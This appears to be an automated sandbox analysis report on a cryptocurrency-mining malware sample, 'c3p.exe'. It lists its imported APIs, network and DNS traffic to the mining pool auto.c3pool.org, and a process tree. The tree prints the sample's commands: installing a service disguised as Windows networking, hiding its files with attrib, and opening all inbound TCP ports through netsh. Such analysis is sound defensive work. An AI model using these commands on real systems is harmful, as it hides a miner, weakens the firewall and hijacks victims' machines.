                                                  KERNEL32.dllFindClose, FindNextFileW, FindFirstFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, GetModuleFileNameW, FindResourceW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetCurrentProcessId, GetLocaleInfoW, GetNumberFormatW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, WaitForSingleObject, GetDateFormatW, GetTimeFormatW, FileTimeToSystemTime, FileTimeToLocalFileTime, GetExitCodeProcess, GetTempPathW, MoveFileExW, UnmapViewOfFile, Sleep, MapViewOfFile, GetCommandLineW, CreateFileMappingW, GetTickCount, OpenFileMappingW, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateThread, GetProcessAffinityMask, CreateEventW, CreateSemaphoreW, ReleaseSemaphore, ResetEvent, SetEvent, SetThreadPriority, SystemTimeToFileTime, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, LocalFileTimeToFileTime, WideCharToMultiByte, MultiByteToWideChar, CompareStringW, IsDBCSLeadByte, SetFileTime, SetFileAttributesW, SetCurrentDirectoryW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoA, GetStringTypeW, GetStringTypeA, LoadLibraryA, GetConsoleMode, GetConsoleCP, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleHandleA, LCMapStringW, LCMapStringA, IsValidCodePage, GetOEMCP, GetACP, GetModuleFileNameA, ExitProcess, HeapSize, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, VirtualAlloc, VirtualFree, HeapCreate, InterlockedDecrement, GetCurrentThreadId, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, GetCommandLineA, RaiseException, GetFileAttributesW, FlushFileBuffers, ReadFile, GetFileType, SetEndOfFile, SetFilePointer, WriteFile, GetStdHandle, GetLongPathNameW, GetShortPathNameW, GlobalAlloc, MoveFileW, CreateFileW, CreateDirectoryW, DeviceIoControl, RemoveDirectoryW, DeleteFileW, CreateHardLinkW, GetCurrentProcess, CloseHandle, SetLastError, GetLastError, CreateFileA, GetCPInfo, GetSystemTimeAsFileTime, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind
                                                  USER32.dllEnableWindow, GetDlgItem, ShowWindow, SetWindowLongW, GetDC, ReleaseDC, FindWindowExW, GetParent, MapWindowPoints, CreateWindowExW, UpdateWindow, LoadCursorW, RegisterClassExW, DefWindowProcW, DestroyWindow, CopyRect, IsWindow, CharUpperW, OemToCharBuffA, LoadIconW, LoadBitmapW, PostMessageW, GetSysColor, SetForegroundWindow, MessageBoxW, WaitForInputIdle, IsWindowVisible, DialogBoxParamW, DestroyIcon, SetFocus, GetClassNameW, SendDlgItemMessageW, EndDialog, GetDlgItemTextW, SetDlgItemTextW, wvsprintfW, SendMessageW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LoadStringW, GetWindowRect, GetClientRect, SetWindowPos, GetWindowTextW, SetWindowTextW, GetSystemMetrics, GetWindow, GetWindowLongW
                                                  GDI32.dllGetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, DeleteDC, GetObjectW, DeleteObject, CreateDIBSection
                                                  COMDLG32.dllGetSaveFileNameW, CommDlgExtendedError, GetOpenFileNameW
                                                  ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegSetValueExW, RegCloseKey, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
                                                  SHELL32.dllSHBrowseForFolderW, ShellExecuteExW, SHGetSpecialFolderLocation, SHFileOperationW, SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHGetFileInfoW
                                                  ole32.dllCLSIDFromString, CoCreateInstance, OleInitialize, OleUninitialize, CreateStreamOnHGlobal
                                                  OLEAUT32.dllVariantInit
                                                  Language of compilation systemCountry where language is spokenMap
                                                  ChineseChina
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 12, 2024 20:13:18.511502981 CEST49706443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:18.511564016 CEST44349706195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:18.511650085 CEST49706443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:18.511755943 CEST49706443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:18.511765003 CEST44349706195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:18.511835098 CEST44349706195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:24.392054081 CEST49707443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:24.392087936 CEST4434970788.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:24.392178059 CEST49707443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:24.392302036 CEST49707443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:24.392312050 CEST4434970788.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:24.392409086 CEST4434970788.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:29.422645092 CEST49708443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:29.422753096 CEST4434970888.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:29.422852039 CEST49708443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:29.422991037 CEST49708443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:29.423037052 CEST4434970888.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:29.423089981 CEST4434970888.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:34.453936100 CEST49714443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:34.453990936 CEST44349714195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:34.454066038 CEST49714443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:34.454310894 CEST49714443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:34.454325914 CEST44349714195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:34.454436064 CEST44349714195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:39.485135078 CEST49715443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:13:39.485196114 CEST44349715159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:13:39.485424995 CEST49715443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:13:39.485610962 CEST49715443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:13:39.485630035 CEST44349715159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:13:39.485738993 CEST44349715159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:13:44.516472101 CEST49716443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:13:44.516521931 CEST44349716159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:13:44.516717911 CEST49716443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:13:44.516717911 CEST49716443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:13:44.516746044 CEST44349716159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:13:44.517098904 CEST44349716159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:13:49.565572977 CEST49717443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:49.565618038 CEST44349717195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:49.568552971 CEST49717443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:49.568629980 CEST49717443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:49.568636894 CEST44349717195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:49.568712950 CEST44349717195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:54.578974009 CEST49718443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:54.579037905 CEST4434971888.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:54.579226971 CEST49718443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:54.579441071 CEST49718443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:13:54.579461098 CEST4434971888.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:54.579495907 CEST4434971888.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:13:59.611083031 CEST49719443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:59.611123085 CEST44349719195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:59.611203909 CEST49719443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:59.611794949 CEST49719443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:13:59.611808062 CEST44349719195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:13:59.611860991 CEST44349719195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:04.657594919 CEST49720443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:04.657629967 CEST44349720159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:04.657797098 CEST49720443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:04.657947063 CEST49720443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:04.657953978 CEST44349720159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:04.658083916 CEST44349720159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:09.720516920 CEST49721443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:09.720566988 CEST44349721195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:09.720654011 CEST49721443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:09.722297907 CEST49721443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:09.722310066 CEST44349721195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:09.722352982 CEST44349721195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:14.735251904 CEST49723443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:14.735299110 CEST44349723195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:14.735390902 CEST49723443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:14.735585928 CEST49723443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:14.735601902 CEST44349723195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:14.735657930 CEST44349723195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:20.624991894 CEST49724443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:20.625027895 CEST44349724159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:20.625169039 CEST49724443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:20.625211954 CEST49724443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:20.625217915 CEST44349724159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:20.625368118 CEST44349724159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:25.844717979 CEST49725443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:25.844765902 CEST4434972588.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:25.844918966 CEST49725443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:25.845076084 CEST49725443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:25.845094919 CEST4434972588.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:25.845148087 CEST4434972588.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:30.891609907 CEST49726443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:30.891649008 CEST44349726195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:30.891761065 CEST49726443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:30.891851902 CEST49726443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:30.891860962 CEST44349726195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:30.891930103 CEST44349726195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:35.954736948 CEST49727443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:35.954790115 CEST4434972788.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:35.954859018 CEST49727443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:35.955066919 CEST49727443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:35.955079079 CEST4434972788.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:35.955121994 CEST4434972788.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:40.985461950 CEST49728443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:40.985513926 CEST44349728195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:40.985631943 CEST49728443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:40.985766888 CEST49728443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:40.985776901 CEST44349728195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:40.985845089 CEST44349728195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:46.032216072 CEST49729443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:46.032260895 CEST44349729195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:46.032365084 CEST49729443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:46.032511950 CEST49729443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:14:46.032525063 CEST44349729195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:46.032578945 CEST44349729195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:14:51.161463022 CEST49730443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:51.161528111 CEST44349730159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:51.161628008 CEST49730443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:51.161710978 CEST49730443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:14:51.161719084 CEST44349730159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:51.161823988 CEST44349730159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:14:57.110472918 CEST49731443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:57.110517025 CEST4434973188.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:57.110651970 CEST49731443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:57.111157894 CEST49731443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:14:57.111169100 CEST4434973188.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:14:57.111206055 CEST4434973188.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:15:02.172905922 CEST49732443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:15:02.172940016 CEST44349732195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:15:02.173054934 CEST49732443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:15:02.173156023 CEST49732443192.168.2.7195.201.97.156
                                                  Jun 12, 2024 20:15:02.173173904 CEST44349732195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:15:02.173252106 CEST44349732195.201.97.156192.168.2.7
                                                  Jun 12, 2024 20:15:07.284236908 CEST49733443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:15:07.284339905 CEST44349733159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:15:07.284427881 CEST49733443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:15:07.284591913 CEST49733443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:15:07.284616947 CEST44349733159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:15:07.284670115 CEST44349733159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:15:12.345000982 CEST49734443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:15:12.345105886 CEST44349734159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:15:12.345194101 CEST49734443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:15:12.345295906 CEST49734443192.168.2.7159.69.83.232
                                                  Jun 12, 2024 20:15:12.345318079 CEST44349734159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:15:12.345386028 CEST44349734159.69.83.232192.168.2.7
                                                  Jun 12, 2024 20:15:17.360820055 CEST49735443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:15:17.360872030 CEST4434973588.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:15:17.361011982 CEST49735443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:15:17.361077070 CEST49735443192.168.2.788.198.117.174
                                                  Jun 12, 2024 20:15:17.361085892 CEST4434973588.198.117.174192.168.2.7
                                                  Jun 12, 2024 20:15:17.361175060 CEST4434973588.198.117.174192.168.2.7
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 12, 2024 20:13:13.690016985 CEST5869653192.168.2.71.1.1.1
                                                  Jun 12, 2024 20:13:18.413228035 CEST5974353192.168.2.71.1.1.1
                                                  Jun 12, 2024 20:13:18.508968115 CEST53597431.1.1.1192.168.2.7
                                                  Jun 12, 2024 20:13:49.554585934 CEST5917653192.168.2.71.1.1.1
                                                  Jun 12, 2024 20:13:49.564718962 CEST53591761.1.1.1192.168.2.7
                                                  Jun 12, 2024 20:14:19.783294916 CEST6141453192.168.2.71.1.1.1
                                                  Jun 12, 2024 20:14:20.623894930 CEST53614141.1.1.1192.168.2.7
                                                  Jun 12, 2024 20:14:51.048129082 CEST5670953192.168.2.71.1.1.1
                                                  Jun 12, 2024 20:14:51.144081116 CEST53567091.1.1.1192.168.2.7
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jun 12, 2024 20:13:13.690016985 CEST192.168.2.71.1.1.10x2f65Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:13:18.413228035 CEST192.168.2.71.1.1.10xf520Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:13:49.554585934 CEST192.168.2.71.1.1.10xec8cStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:19.783294916 CEST192.168.2.71.1.1.10x91d9Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:51.048129082 CEST192.168.2.71.1.1.10xbf5fStandard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jun 12, 2024 20:13:13.698090076 CEST1.1.1.1192.168.2.70x2f65No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Jun 12, 2024 20:13:18.508968115 CEST1.1.1.1192.168.2.70xf520No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:13:18.508968115 CEST1.1.1.1192.168.2.70xf520No error (0)auto.c3pool.org159.69.83.232A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:13:18.508968115 CEST1.1.1.1192.168.2.70xf520No error (0)auto.c3pool.org195.201.97.156A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:13:49.564718962 CEST1.1.1.1192.168.2.70xec8cNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:13:49.564718962 CEST1.1.1.1192.168.2.70xec8cNo error (0)auto.c3pool.org159.69.83.232A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:13:49.564718962 CEST1.1.1.1192.168.2.70xec8cNo error (0)auto.c3pool.org195.201.97.156A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:20.623894930 CEST1.1.1.1192.168.2.70x91d9No error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:20.623894930 CEST1.1.1.1192.168.2.70x91d9No error (0)auto.c3pool.org159.69.83.232A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:20.623894930 CEST1.1.1.1192.168.2.70x91d9No error (0)auto.c3pool.org195.201.97.156A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:51.144081116 CEST1.1.1.1192.168.2.70xbf5fNo error (0)auto.c3pool.org88.198.117.174A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:51.144081116 CEST1.1.1.1192.168.2.70xbf5fNo error (0)auto.c3pool.org159.69.83.232A (IP address)IN (0x0001)false
                                                  Jun 12, 2024 20:14:51.144081116 CEST1.1.1.1192.168.2.70xbf5fNo error (0)auto.c3pool.org195.201.97.156A (IP address)IN (0x0001)false

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:14:13:12
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                  Imagebase:0x7ff7b4ee0000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:14:13:13
                                                  Start date:12/06/2024
                                                  Path:C:\Users\user\Desktop\c3p.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\c3p.exe"
                                                  Imagebase:0x7ff75da10000
                                                  File size:3'127'301 bytes
                                                  MD5 hash:02AA02AEE2A6BD93A4A8F4941A0E6310
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:14:13:15
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "
                                                  Imagebase:0x410000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:14:13:15
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:14:13:15
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\debug\c3p\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe
                                                  Imagebase:0x400000
                                                  File size:294'912 bytes
                                                  MD5 hash:D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 8%, ReversingLabs
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:14:13:15
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:sc config "Networks2" DisplayName= "Networksrs2"
                                                  Imagebase:0x500000
                                                  File size:61'440 bytes
                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:14:13:15
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:sc description "Networks2" "Microsoft Windows Networks"
                                                  Imagebase:0x500000
                                                  File size:61'440 bytes
                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:sc start "Networks2"
                                                  Imagebase:0xaf0000
                                                  File size:61'440 bytes
                                                  MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\debug\c3p\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\WINDOWS\Debug\c3p\svchost.exe
                                                  Imagebase:0x400000
                                                  File size:294'912 bytes
                                                  MD5 hash:D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:10
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\attrib.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:attrib C:\Windows\debug\c3p +h +a
                                                  Imagebase:0xab0000
                                                  File size:19'456 bytes
                                                  MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\attrib.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:attrib C:\Windows\debug\c3p\*.json +h +a +s +r
                                                  Imagebase:0xab0000
                                                  File size:19'456 bytes
                                                  MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\attrib.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:attrib C:\Windows\debug\c3p\*.exe +h +a +s +r
                                                  Imagebase:0xab0000
                                                  File size:19'456 bytes
                                                  MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
                                                  Imagebase:0x1770000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:15
                                                  Start time:14:13:16
                                                  Start date:12/06/2024
                                                  Path:C:\Windows\debug\c3p\systems.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\WINDOWS\Debug\c3p\systems.exe"
                                                  Imagebase:0x7ff706b90000
                                                  File size:8'251'392 bytes
                                                  MD5 hash:E2FE87CC2C7DAB8CA6516620DCCD1381
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.2581832116.000001A465C15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
